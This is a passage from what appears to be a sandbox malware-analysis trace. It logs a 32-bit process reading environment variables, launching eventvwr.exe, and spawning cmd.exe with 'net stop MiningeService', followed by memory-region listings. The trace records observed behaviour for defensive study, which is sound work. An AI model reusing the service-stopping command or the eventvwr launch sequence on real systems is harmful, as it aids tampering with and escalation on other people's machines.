(in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328fd8 | out: hHeap=0x300000) returned 1 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 26 [0265.674] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x34) returned 0x32bff0 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280c8, cbMultiByte=-1, lpWideCharStr=0x32bff0, cchWideChar=26 | out: lpWideCharStr="HOMEPATH=\\Users\\kEecfMwgj") returned 26 [0265.674] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32b728 | out: hHeap=0x300000) returned 1 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d9e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0265.674] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x5c) returned 0x32aa00 [0265.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d9e8, cbMultiByte=-1, lpWideCharStr=0x32aa00, cchWideChar=46 | out: lpWideCharStr="LOCALAPPDATA=C:\\Users\\kEecfMwgj\\AppData\\Local") returned 46 [0265.675] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32aa70 | out: hHeap=0x300000) returned 1 [0265.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 25 [0265.675] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x32) returned 0x32c030 [0265.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3280f0, cbMultiByte=-1, lpWideCharStr=0x32c030, cchWideChar=25 | out: lpWideCharStr="LOGONSERVER=\\\\Q9IATRKPRH") returned 25 [0265.675] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32aad8 | out: hHeap=0x300000) returned 1 [0265.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328258, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0265.675] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31dd68 [0265.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328258, cbMultiByte=-1, lpWideCharStr=0x31dd68, cchWideChar=23 | out: lpWideCharStr="NUMBER_OF_PROCESSORS=1") returned 23 [0265.676] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31dda0 | out: hHeap=0x300000) returned 1 [0265.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ac8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0265.676] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1c) returned 0x328fd8 [0265.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ac8, cbMultiByte=-1, lpWideCharStr=0x328fd8, cchWideChar=14 | out: lpWideCharStr="OS=Windows_NT") returned 14 [0265.676] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x329000 | out: hHeap=0x300000) returned 1 [0265.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 149 [0265.676] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x12a) returned 0x32d188 [0265.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328278, cbMultiByte=-1, lpWideCharStr=0x32d188, cchWideChar=149 | out: lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 149 [0265.676] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e638 | out: hHeap=0x300000) returned 1 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x311fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0265.677] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x7c) returned 0x32aa70 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x311fc8, cbMultiByte=-1, lpWideCharStr=0x32aa70, cchWideChar=62 | out: lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 62 [0265.677] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32ab18 | out: hHeap=0x300000) returned 1 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328118, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0265.677] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32c070 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328118, cbMultiByte=-1, lpWideCharStr=0x32c070, cchWideChar=27 | out: lpWideCharStr="PROCESSOR_ARCHITECTURE=x86") returned 27 [0265.677] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32aba0 | out: hHeap=0x300000) returned 1 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328140, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 29 [0265.677] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3a) returned 0x312208 [0265.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328140, cbMultiByte=-1, lpWideCharStr=0x312208, cchWideChar=29 | out: lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64") returned 29 [0265.678] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x312250 | out: hHeap=0x300000) returned 1 [0265.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x319528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0265.678] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x90) returned 0x32aaf8 [0265.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x319528, cbMultiByte=-1, lpWideCharStr=0x32aaf8, cchWideChar=72 | out: lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel") returned 72 [0265.678] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e770 | out: hHeap=0x300000) returned 1 [0265.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328318, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0265.678] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d470 [0265.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328318, cbMultiByte=-1, lpWideCharStr=0x31d470, cchWideChar=18 | out: lpWideCharStr="PROCESSOR_LEVEL=6") returned 18 [0265.678] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d4a0 | out: hHeap=0x300000) returned 1 [0265.678] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328338, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0265.679] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x31dda0 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328338, cbMultiByte=-1, lpWideCharStr=0x31dda0, cchWideChar=24 | out: lpWideCharStr="PROCESSOR_REVISION=5504") returned 24 [0265.679] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31ddd8 | out: hHeap=0x300000) returned 1 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328168, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0265.679] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x36) returned 0x32c0b0 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328168, cbMultiByte=-1, lpWideCharStr=0x32c0b0, cchWideChar=27 | out: lpWideCharStr="ProgramData=C:\\ProgramData") returned 27 [0265.679] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32bfb0 | out: hHeap=0x300000) returned 1 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d350, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0265.679] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x48) returned 0x319668 [0265.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31d350, cbMultiByte=-1, lpWideCharStr=0x319668, cchWideChar=36 | out: lpWideCharStr="ProgramFiles=C:\\Program Files (x86)") returned 36 [0265.680] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3196b8 | out: hHeap=0x300000) returned 1 [0265.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0265.680] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32d710 [0265.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da20, cbMultiByte=-1, lpWideCharStr=0x32d710, cchWideChar=41 | out: lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)") returned 41 [0265.681] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32d770 | out: hHeap=0x300000) returned 1 [0265.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0265.681] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3c) returned 0x312250 [0265.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328190, cbMultiByte=-1, lpWideCharStr=0x312250, cchWideChar=30 | out: lpWideCharStr="ProgramW6432=C:\\Program Files") returned 30 [0265.681] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x312298 | out: hHeap=0x300000) returned 1 [0265.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328358, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0265.681] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0xd6) returned 0x32e638 [0265.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328358, cbMultiByte=-1, lpWideCharStr=0x32e638, cchWideChar=107 | out: lpWideCharStr="PSModulePath=C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 107 [0265.681] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32cf98 | out: hHeap=0x300000) returned 1 [0265.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3283d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0265.681] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2e) returned 0x31ddd8 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3283d0, cbMultiByte=-1, lpWideCharStr=0x31ddd8, cchWideChar=23 | out: lpWideCharStr="PUBLIC=C:\\Users\\Public") returned 23 [0265.682] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e820 | out: hHeap=0x300000) returned 1 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3283f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 20 [0265.682] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x28) returned 0x31d4a0 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3283f0, cbMultiByte=-1, lpWideCharStr=0x31d4a0, cchWideChar=20 | out: lpWideCharStr="SESSIONNAME=Console") returned 20 [0265.682] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d4d0 | out: hHeap=0x300000) returned 1 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ae0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0265.682] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x1e) returned 0x329000 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x314ae0, cbMultiByte=-1, lpWideCharStr=0x329000, cchWideChar=15 | out: lpWideCharStr="SystemDrive=C:") returned 15 [0265.682] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x329028 | out: hHeap=0x300000) returned 1 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328410, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0265.682] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x32e820 [0265.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328410, cbMultiByte=-1, lpWideCharStr=0x32e820, cchWideChar=22 | out: lpWideCharStr="SystemRoot=C:\\Windows") returned 22 [0265.683] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e858 | out: hHeap=0x300000) returned 1 [0265.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 42 [0265.683] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x54) returned 0x32d770 [0265.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da58, cbMultiByte=-1, lpWideCharStr=0x32d770, cchWideChar=42 | out: lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 42 [0265.683] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32d7d0 | out: hHeap=0x300000) returned 1 [0265.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0265.683] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x52) returned 0x32d7d0 [0265.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31da90, cbMultiByte=-1, lpWideCharStr=0x32d7d0, cchWideChar=41 | out: lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 41 [0265.684] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32d830 | out: hHeap=0x300000) returned 1 [0265.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328430, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0265.684] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x2c) returned 0x32e858 [0265.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328430, cbMultiByte=-1, lpWideCharStr=0x32e858, cchWideChar=22 | out: lpWideCharStr="USERDOMAIN=Q9IATRKPRH") returned 22 [0265.684] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e890 | out: hHeap=0x300000) returned 1 [0265.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328468, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0265.684] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x26) returned 0x31d4d0 [0265.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328468, cbMultiByte=-1, lpWideCharStr=0x31d4d0, cchWideChar=19 | out: lpWideCharStr="USERNAME=kEecfMwgj") returned 19 [0265.685] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d500 | out: hHeap=0x300000) returned 1 [0265.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3281b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0265.685] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x3e) returned 0x312298 [0265.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3281b8, cbMultiByte=-1, lpWideCharStr=0x312298, cchWideChar=31 | out: lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj") returned 31 [0265.685] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x3122e0 | out: hHeap=0x300000) returned 1 [0265.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328488, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 18 [0265.685] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x24) returned 0x31d500 [0265.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x328488, cbMultiByte=-1, lpWideCharStr=0x31d500, cchWideChar=18 | out: lpWideCharStr="windir=C:\\Windows") returned 18 [0265.686] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x31d530 | out: hHeap=0x300000) returned 1 [0265.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3284a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0265.686] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x30) returned 0x32e890 [0265.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3284a8, cbMultiByte=-1, lpWideCharStr=0x32e890, cchWideChar=24 | out: lpWideCharStr="windows_tracing_flags=3") returned 24 [0265.686] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e8c8 | out: hHeap=0x300000) returned 1 [0265.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x319578, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 70 [0265.686] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x8c) returned 0x32cf98 [0265.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x319578, cbMultiByte=-1, lpWideCharStr=0x32cf98, cchWideChar=70 | out: lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log") returned 70 [0265.686] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32d078 | out: hHeap=0x300000) returned 1 [0265.687] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x329028 [0265.687] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x32e8c8 [0265.687] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x329028 | out: hHeap=0x300000) returned 1 [0265.687] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328f38 | out: hHeap=0x300000) returned 1 [0265.687] GetLongPathNameW (in: lpszShortPath="C:\\Windows\\SysWOW64", lpszLongPath=0x18f958, cchBuffer=0x208 | out: lpszLongPath="C:\\Windows\\SysWOW64") returned 0x13 [0265.689] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x20) returned 0x329028 [0265.689] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x30) returned 0x32e938 [0265.689] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x50) returned 0x32ab90 [0265.689] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e938 | out: hHeap=0x300000) returned 1 [0265.690] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x329028 | out: hHeap=0x300000) returned 1 [0265.690] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x32e8c8 | out: hHeap=0x300000) returned 1 [0265.691] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x328f10 | out: hHeap=0x300000) returned 1 [0265.691] ShellExecuteW (hwnd=0x0, lpOperation="open", lpFile="C:\\Windows\\SysWOW64\\eventvwr.exe", lpParameters="", lpDirectory="", nShowCmd=0) returned 0x2a [0279.790] GetCurrentThreadId () returned 0xc84 [0282.308] GetProcessHeap () returned 0x300000 [0282.309] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a80) returned 1 [0282.309] GetProcessHeap () returned 0x300000 [0282.309] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a50) returned 1 [0282.309] GetProcessHeap () returned 0x300000 [0282.310] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x325850) returned 1 [0282.310] GetProcessHeap () returned 0x300000 [0282.311] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x324e08) returned 1 [0282.311] GetProcessHeap () returned 0x300000 [0282.311] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x3249f0) returned 1 [0282.311] GetProcessHeap () returned 0x300000 [0282.311] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a98) returned 1 [0282.311] GetProcessHeap () returned 0x300000 [0282.312] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a68) returned 1 [0282.312] GetProcessHeap () returned 0x300000 [0282.312] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a38) returned 1 [0282.312] GetProcessHeap () returned 0x300000 [0282.312] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a20) returned 1 [0282.312] GetProcessHeap () returned 0x300000 [0282.312] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x314a08) returned 1 [0282.713] ExitProcess (uExitCode=0x0) [0284.739] HeapFree (in: hHeap=0x300000, dwFlags=0x0, lpMem=0x326a80 | out: hHeap=0x300000) returned 1 Thread: id = 209 os_tid = 0xb4c Thread: id = 211 os_tid = 0x7c8 Thread: id = 212 os_tid = 0x7dc Process: id = "19" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6312f000" os_pid = "0xcdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xc94" cmd_line = "C:\\Windows\\system32\\cmd.exe /C net stop MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5272 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5273 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5274 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5275 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5276 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5277 start_va = 0x110000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 5278 start_va = 0x290000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 5279 start_va = 0x4a450000 end_va = 0x4a49bfff monitored = 1 entry_point = 0x4a45829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5280 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5281 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5282 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5283 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5284 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5285 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5286 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5287 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5288 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5327 start_va = 0x510000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 5328 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5329 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5330 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5331 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5332 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5333 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = 